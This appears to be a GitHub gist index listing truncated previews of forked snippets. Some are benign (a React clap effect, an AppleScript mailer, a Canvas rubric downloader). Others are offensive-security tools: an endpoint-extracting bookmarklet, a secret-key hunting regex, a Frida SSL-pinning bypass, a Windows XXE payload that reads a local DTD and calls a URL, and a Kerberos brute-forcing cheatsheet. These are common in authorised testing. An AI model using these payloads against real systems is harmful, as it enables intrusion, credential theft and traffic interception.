dslusser / js_endpoints_new_tab.js

Created December 21, 2024 19:55 — forked from mhmdiaa/js_endpoints_new_tab.js

All credit goes to @renniepak for the original bookmarklet https://twitter.com/renniepak/status/1602620834463588352

	javascript: (function() {
	var scripts = document.getElementsByTagName("script"),
	regex = /(?<=(\"\|\%27\|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"\|\'\|\%60))/g;
	const results = new Set;
	for (var i = 0; i < scripts.length; i++) {
	var t = scripts[i].src;
	"" != t && fetch(t).then(function(t) {
	return t.text()
	}).then(function(t) {
	var e = t.matchAll(regex);

dslusser / Generic keys

Created October 3, 2024 23:42 — forked from h4x0r-dz/Generic keys

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

dslusser / universalUnpin.js

Created September 27, 2024 14:39 — forked from teknogeek/universalUnpin.js

Frida Universal™ SSL Unpinner

	Java.perform(function() {
	console.log('\n[.] Cert Pinning Bypass');

	// Create a TrustManager that trusts everything
	console.log('[+] Creating a TrustyTrustManager that trusts everything...');
	var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
	var TrustyTrustManager = Java.registerClass({
	name: 'com.example.TrustyTrustManager',
	implements: [X509TrustManager],
	methods: {

dslusser / gist:2e5b3b32d81a66638dc1dd6eb208c17d

Created April 2, 2024 14:56 — forked from Rhynorater/gist:d0d19f757221a916a22476c3a5c6aba2

Shubs Windows XXE Payload

	<!DOCTYPE doc [
	<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
	<!ENTITY % SuperClass '>
	<!ENTITY % file SYSTEM "http://example.com:9200/_cat/indices">
	<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>">
	%eval;
	%error;
	<!ENTITY test "test"'
	>
	%local_dtd;

dslusser / getAllGlobals.js

Created April 2, 2024 14:52 — forked from colinrubbert/getAllGlobals.js

Get all runtime global variables set by the app

	/**
	* RuntimeGlobalsChecker
	*
	* You can use this utility to quickly check what variables have been added (or
	* leaked) to the global window object at runtime (by JavaScript code).
	* By running this code, the globals checker itself is attached as a singleton
	* to the window object as "__runtimeGlobalsChecker__".
	* You can check the runtime globals programmatically at any time by invoking
	* "window.__runtimeGlobalsChecker__.getRuntimeGlobals()".
	*

dslusser / download_canvas_rubric.js

Last active September 14, 2023 21:31 — forked from acbart/download_canvas_rubric.js

Snippet to download Canvas rubric data for current assignment as a CSV file

	(async function(){

	// More info on usage - dws:
	// https://community.canvaslms.com/t5/Canvas-Developers-Group/Rubric-Analysis-Using-the-API/ba-p/270213
	// Basically just copy/paste this script to the Developer Tools -> Console tab on any Canvas Assignment page
	// that has a rubic as a grading method.

	// Original Github Gist: https://gist.github.com/acbart/0bfd1b2dbc324b345c305e362e00273c

	// https://stackoverflow.com/questions/8735792/how-to-parse-link-header-from-github-api

dslusser / AppleScript Mail Send.scpt

Created February 8, 2023 19:25 — forked from youandhubris/AppleScript Mail Send.scpt

AppleScript to send e-mail, using Apple's Mail, with multiple recipients, cc, bcc and attachments

	tell application "Mail"

	set theFrom to ""
	set theTos to {}
	set theCcs to {}
	set theBccs to {}

	set theSubject to ""
	set theContent to ""
	set theSignature to ""

dslusser / kerberos_attacks_cheatsheet.md

Created February 5, 2022 04:58 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md

A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

dslusser / makekali.sh

Last active January 21, 2021 20:25 — forked from warecrash/makekali.sh

Convert Debian to Kali

	apt update
	apt -y install wget gnupg dirmngr
	wget -q -O - https://archive.kali.org/archive-key.asc \| gpg --import
	gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6
	echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
	echo "deb http://http.kali.org/kali kali-last-snapshot main non-free contrib" >> /etc/apt/sources.list
	gpg -a --export ED444FF07D8D0BF6 \| sudo apt-key add -
	apt update
	apt -y upgrade
	apt -y dist-upgrade

dslusser / index.html

Created February 11, 2019 16:58

Medium clap effect w/ ReactJS

	<div id="app"></div>
	<aside id="message">In case you didn't know, you gotta click the clap button above 😎😜😜
	<br />
	<a href="https://twitter.com/OhansEmmanuel" target="_blank">@ohansemmanuel</a>
	<br />
	<a href="https://codepen.io/ohansemmanuel/full/dVdvJQ/"
	target="_blank">
	See Vanilla JS implementation
	</a>
	</aside>